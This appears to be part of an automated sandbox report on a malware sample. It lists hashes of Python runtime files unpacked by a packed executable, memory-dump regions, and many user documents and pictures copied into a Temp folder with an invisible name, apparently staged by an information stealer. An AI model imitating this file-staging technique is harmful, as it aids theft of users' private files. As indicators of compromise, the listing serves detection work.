SHA512 fbb599270066c43b5d3a4e965fb2203b085686479af157cd0bb0d29ed73248b6f6371c5158799f6d58b1f1199b82c01abe418e609ea98c71c37bb40f3226d8c5

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\vcruntime140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\_sqlite3.pyd

MD5 64417c2ccd84392880b417e8a9f7a4bc
SHA1 88c6139471737b14d4161c010b10ad9615766dbb
SHA256 fdeacc2aff71fe21d7a0de0603388299fa203c2692fdbdb3709f1bc4cc9cdc0e
SHA512 05163d678f18ea901c5da45f41ee25073b7834e711c2809f98df122e6485b3979c5331709a6f48079a53931d3dbc3b569738b51736260ce1b67811c073c7ea84

memory/4828-188-0x000001CBD6F30000-0x000001CBD6F52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ypccf3vs.3go.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4800-189-0x00007FF7AABA0000-0x00007FF7AB738000-memory.dmp

memory/3344-191-0x00007FF7B1C40000-0x00007FF7B24F0000-memory.dmp

memory/3448-190-0x00007FF789870000-0x00007FF78AAFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\python3.dll

MD5 5eace36402143b0205635818363d8e57
SHA1 ae7b03251a0bac083dec3b1802b5ca9c10132b4c
SHA256 25a39e721c26e53bec292395d093211bba70465280acfa2059fa52957ec975b2
SHA512 7cb3619ea46fbaaf45abfa3d6f29e7a5522777980e0a9d2da021d6c68bcc380abe38e8004e1f31d817371fb3cdd5425d4bb115cb2dc0d40d59d111a2d98b21d4

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\_cffi_backend.pyd

MD5 fcb71ce882f99ec085d5875e1228bdc1
SHA1 763d9afa909c15fea8e016d321f32856ec722094
SHA256 86f136553ba301c70e7bada8416b77eb4a07f76ccb02f7d73c2999a38fa5fa5b
SHA512 4a0e98ab450453fd930edc04f0f30976abb9214b693db4b6742d784247fb062c57fafafb51eb04b7b4230039ab3b07d2ffd3454d6e261811f34749f2e35f04d6

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\bcrypt\_bcrypt.pyd

MD5 829ac778d5a82a72fd5f83312d929a93
SHA1 b42fc4b15c7f9ad2bb84a0cc07040701ea462a0f
SHA256 3d26efeedd40e9cb67d66803b235f56d38a5932d1d82b86cae4edace5385d27a
SHA512 d76f474ebc9bb9e84aaa989b40cf9783469757b535424db3913fb4bb1c39014e4b17f0067232dcefd9a5429dd0d4ae9ec15dbce99cb2fbf285f745739f32d22b

memory/3536-198-0x00007FF6C7900000-0x00007FF6C85C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\cryptography\hazmat\bindings\_rust.pyd

MD5 81ad4f91bb10900e3e2e8eaf917f42c9
SHA1 840f7aef02cda6672f0e3fc7a8d57f213ddd1dc6
SHA256 5f20d6cec04685075781996a9f54a78dc44ab8e39eb5a2bcf3234e36bef4b190
SHA512 11cd299d6812cdf6f0a74ba86eb44e9904ce4106167ebd6e0b81f60a5fcd04236cef5cff81e51ed391f5156430663056393dc07353c4a70a88024194768ffe9d

memory/5012-199-0x00007FF764D00000-0x00007FF76588B000-memory.dmp

memory/1688-281-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/2904-290-0x00007FF79AA50000-0x00007FF79C11F000-memory.dmp

memory/5012-296-0x00007FF764D00000-0x00007FF76588B000-memory.dmp

memory/1540-302-0x0000021CAC0C0000-0x0000021CAC0C8000-memory.dmp

memory/1688-357-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/2904-366-0x00007FF79AA50000-0x00007FF79C11F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Desktop\BlockGroup.mp4

MD5 854861b1513c9fee88633c6a0b22d7c7
SHA1 c5826ce0972ad0af445ca62f065e98a495d0446d
SHA256 9634f8470ee7d7d2fec7703887d2a89cb204988797885e53abaa0b18365199c3
SHA512 6cba375d4711c527912fe6793151a46672161695849d115b57a1ca0f65c655e3342b5aabd662a447f343cceaf17e9a6eeb3ff77359f3f336e8595445b4707885

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Desktop\ConnectUnlock.docx

MD5 fc82aed340df49d870068e846068c51d
SHA1 6b573b5aeb0e7a6c5607d66f3567e8dc721d175e
SHA256 93a585c81d7c49de929034a37a43a10e5ec1496af8be9a20679c12233c473743
SHA512 18475eef4d096150c62314bfb785e7d6383d555e0340f9419d530caf7745749b882ffdd090bee919d0f402365a2088c69592270c6296e3d48128db50ee17a372

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Desktop\FormatUndo.mp4

MD5 c82f2105ee621a7a4b17adaf5ff24923
SHA1 894e1f2de84a1c5af9c4ec20db220f22b58cf271
SHA256 b74bf73c394f5cedcfd3b0adb265fc2f86a3bf57798012598b5b5fcc808b30c6
SHA512 cfd5508423dfb8fd5e3859c1637065e4fa1e0cf4d968342dc3d88b9d0aa480252bd348e6cbe3c7238e56b982ae7723f342427643bbaa545edb5b247b93b7ed1d

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Desktop\PopMove.docx

MD5 0d5e27a2bd03579b5d0288508aa97cfb
SHA1 61a69d28eb322e127e49636960b40252d932d45f
SHA256 de90f1e87390addde3935362bc82a3e110e8cb34dc094decccc5135982a6092e
SHA512 9c59a9f36f1e89e941819f0f0d91b1aa88b067ab16c68003fa243ab1e25d088b847eadbc934a47468c3b0283525b14374481102fad258440862dfedee2d6b094

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\PublishRedo.xlsx

MD5 4f54ab34036be6820e6167f9aefe280f
SHA1 7958e52a3dac3019783d73a7d1be3e3bd2b3dd8a
SHA256 76f8beba3680a2d8dce24dde001f1bb88da426c628741cddc07e554f1e34c38f
SHA512 52ce7d9656c886f2f4c16b806d032b10184a23cb9d172d3714a0db2a3cf98aeb47b59f5f4cf4f5af78f5d38a81d7814d58a2d4a7ed6ae035cfe6c11e3fe6b532

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\MeasureAdd.docx

MD5 a85d612d78245a79ba4a1ba72d6cd8bf
SHA1 01e8e1d8eea5624213eb58cea39e510e76057bff
SHA256 ab8f666578cbbef16b257fc7a6bb00889b08d45689ac887d456fb8a8ccb3d7ed
SHA512 c84d819eb620b419fe017b7b548ebfa65bcadd7a689cde6c53a07471c05d20fa39cdaeecb2919d19d527829cd307d2f5a0c7c4c9cfc4d270ed28cb9b2ae105d7

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\LockCompress.csv

MD5 4eb97f4229920de87a35a8c7e9278f53
SHA1 333c5d9d95438ac3b6b827ee3b3f1bf01fa94b8b
SHA256 aec3ca381e5515114a618e78d453da5f839823d8545e6d925cf63c451892b487
SHA512 65198255fc56d09e8b2c08a9c4689d32c60d48e2189b321aa2537509bfdcb904e1b1b987bffcd98646ac0042c5d6ab1e72351db936391ad33ff29e580793b20a

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\CheckpointConvertTo.docx

MD5 966274f6d75e1194200821685b22f613
SHA1 d29dc97f944427ac4b9f2ac75757c1f8c0ca43dc
SHA256 954c226c5c4cd02101c0b473c3a648df6a3e2be522a1163db32e3e27b4422a6e
SHA512 19b78b221f401c39a20e02e222d222308893a084b9da39d7f717b8b7dc7cb6b397a8a3345ad77356b6edb85e6cb168ba4fd0adfcfc0f1055fe573f6494f5baea

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\RegisterRequest.xlsx

MD5 b2cf35d34c7eeea9595ca86d29fe3088
SHA1 8453cdf847e81c841e3a0106df84507bc830dd8a
SHA256 cbb45ca218fcd89371424e7783a3fa92f7f6be486d337a7d73382552da326c2b
SHA512 15a08ff30b395ce187399688ff950aaa274ae91583cb5c84034d94734eac1f94611972dbeb8b89c0faec12f37a9c2fada0acffe9fae9f7b0174fd75e19cd14e7

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\RestoreClear.csv

MD5 6398796fea6881c3d95f45b86b42e540
SHA1 8cf6883ad0bddb067089b9e90abe16bc4072ff71
SHA256 ee0e846b2928d7491b5534e6cba0d96ca9a14ca61b77b91f3f86e550cba0e408
SHA512 1091b53a0c7064aa7ddbaae8226b15957b337d5fae7b03eb17c3ce2f34e8351331250af37e01938e6c024933f186bdc08fdd73df90dd6dbf249835cb4e71da10

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\SendUnregister.txt

MD5 05653d97efca92edb95566fc207cc557
SHA1 1149508c66540ddb4ad40e530ea4f9f91a7d1c49
SHA256 fe1de898734274f579d2613b7254e97aaca50253c8b81d992406fc3504fbe556
SHA512 deed5c4272c10b597617bd9c7dd3ae1fd231e2853f153d663b449956513e7baccc9840c991a026c370ab353ae7221dddb34b5777b087c6dd31bdec87ee539131

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\WriteRestore.csv

MD5 9076e2d2f6d9851079e565e18b3bd84e
SHA1 250ce06a869573b43cdd3d1455573b20c3e52f45
SHA256 3b3dab8b3a6798525ab10f7e97de8a6fce1c83e72aba80620bd40b375fb32ebc
SHA512 ceac6ce50c34108e503b9573d9c85a8a5b7285b49160c1d5a48ac533106a5cae84a4f25781177175dc3ff4d53c4f232f86ace15a08bb8cefdc68361b4793ab89

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\UpdateApprove.docx

MD5 798b7e3dcb85282bb310ff12e27c041f
SHA1 b6fd744a99875e90180fda1557632a5ae4045c2a
SHA256 5e35d9950165403f1edcb903763ce949a3a23277ed94b533b3946d6c71dc9a20
SHA512 12d84b0fa787d7e4b906c2a1a49b46a925c3a9e2f07481bd6e14a6c1aaeb9e83c7036f5ea447c056da242770a5f1eb13d1035abd1c7dbd4f77be1c26f395c64b

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\ExitWatch.png

MD5 bb997d368e71bf02673e8cdd9812cc13
SHA1 61051ea9a0a6a365f04afda916cb60cf6acdb653
SHA256 5e07646657c6aaf979aef81ee3d9159d0015481a2459bf7164b4f8a11bd563d8
SHA512 4250def566c2eaa44d23dc333e2b97b94e526426fe93d5ce4c9db9b3659536f74cf96bf507a05ffca2089a8d4349f60d317496624be0414243fdce5e3469154e

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\InitializeEnter.mp3

MD5 8fc5ba0eb97cfb10f9fe88eb6b29063f
SHA1 7e87748863c9158726e46c5923f54e292b29e575
SHA256 d2959f0b3bb79f43bf6884b411273941848f922a3e5a4c12c238b75b50efe541
SHA512 b45b7860c1b73886241c656e52a066396d71478e101c2b22c3a712cacd31faf9d8b31990edb2cf84ea42805018edd3689c1900db5cfd81f6ee6fb55458cb751f

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\MeasureProtect.mp4

MD5 75c8f683ad31887989b7db2e16a51c85
SHA1 ced2a46eac4f1a7b8e3740f1e0365a74deff8f1b
SHA256 072eb6c5249e427d7200cf84b545b5ae60ba51cff34b6510955748923382dcd8
SHA512 4e19dd8a6ec0f15618879b64d25096561c76a8d841086c7adb068f1008d20b4f4933c3e51e9ba77fd70af8cb8f17bf0839baeca11e5a9edb87c73f23f3b7ff8e

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\MoveResume.doc

MD5 35222d4bc0bc9832a8ce570d05b69d1c
SHA1 57782bf12ce442157d91c89e0a780585e26f4dc0
SHA256 5761a4304c221cb3dce834d88f01c787b4a766bee23b554dfbf3108fc022472b
SHA512 1b705ac82ca881c8bd8b70918a611a98d5f734dc8730bcb38830188fb2213cdf38529e38c7ca80c155ab15120e37ec2195b49cbf6ca582b851e114554010f646

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\PushWrite.jpeg

MD5 db37f8f779749069bae4fd0bfa172ae2
SHA1 397476f095c9b3a0219e4a6e072c23dd8d114761
SHA256 e5a66dfab2b41ba9973d2b931301ceddc2ebbc6b0c171a49c2d1678826409190
SHA512 47551226ebd57fb21c101ec247d72a7f801cb64d70387dcf6459c9a40dd58236dd2f6322399f40fa3240cd51aa36ed2bc91cbac366a95b664f230106d757258f

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\SuspendInstall.png

MD5 dfa5fab0bcd9a977e789709df17bae4b
SHA1 e9b7d8cebaac11de981a55d65826e107b7423de4
SHA256 383902a922b08f5629637b6d5b572f76bd1d976520ac963e651631d09d019029
SHA512 2e0f053e0b0c963a68a96d3f32d2d7fd5df0eb51431384c549d2988d32b06063f2484f2501b101e9fb303366e7f6818bec7715c8ecf8d58efe7e8edfcf9ba773

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\UninstallFormat.docx

MD5 0644f6e3d7aeb3ced98c9a860d0c15c3
SHA1 af747da43ffa79f0d13c91dba4f03a470077d043
SHA256 6c5fc0c4ffdc0357c9962d97b17e3fb666b4e3213f65fd50f948b006bfc1ce32
SHA512 847d7da450b98c21ad2d5918602bf93e906f1d7cd308bcf2673f71f170e480406df325f7f11d56e00ec19a156f52384059b4badfab943a015832b11406657378

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Pictures\ConnectRevoke.png

MD5 a2b8b3135eae285b5b78a05849cd329b
SHA1 b18b1b2c19869299b33465f80ec223e72873b4f4
SHA256 5fea38fbd0cdceaac0e44223f4bcdff00b73af9e61ec2338429798d5182a701b
SHA512 2939ac4308dae2110ad2617691b2f7eb64efbd329a786c58905be5c4c90c5dfc828ea7aeb9507543d37314850f479b157045167254228157a70933bd2f5222f1

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Pictures\DebugSuspend.jpeg

MD5 5f7deb5baa673d813f8db2858930e3ac
SHA1 d83ec872bae4877032def8b1e66d0ee5c5f8dd57
SHA256 f49ec63c3a051ba5755101ee4766baa9deef9b22f1d2c13616faf004751cf6ed
SHA512 d7490fbdd005eab89753f9b34529cfeef76800eb15ac3d3cda7966a1cff97e343cb327005faa3df728d6282fc643f76ddd01b80bc9a9c82a38152b5519d5d2d1

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Pictures\DisablePop.png

MD5 18bc489c09c06f3c472146e553f055ac
SHA1 874715bdaa07c0e88bfe8b42ef6f98ddf4c2047c
SHA256 fe3dccc203ee0c13b6d905a0b8e23e996a5e74af91022a868403a8c17c361d41
SHA512 c17f8bcbe815fbb3e279b87dcb19f6cc785af583218ae424937a8e5d7312e176859f0b45e6907061bef1ba1615de1a004324bd35d2ca32022837374ac5cf766c

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

memory/1688-480-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/1688-504-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/1688-540-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/3344-544-0x00007FF7B1C40000-0x00007FF7B24F0000-memory.dmp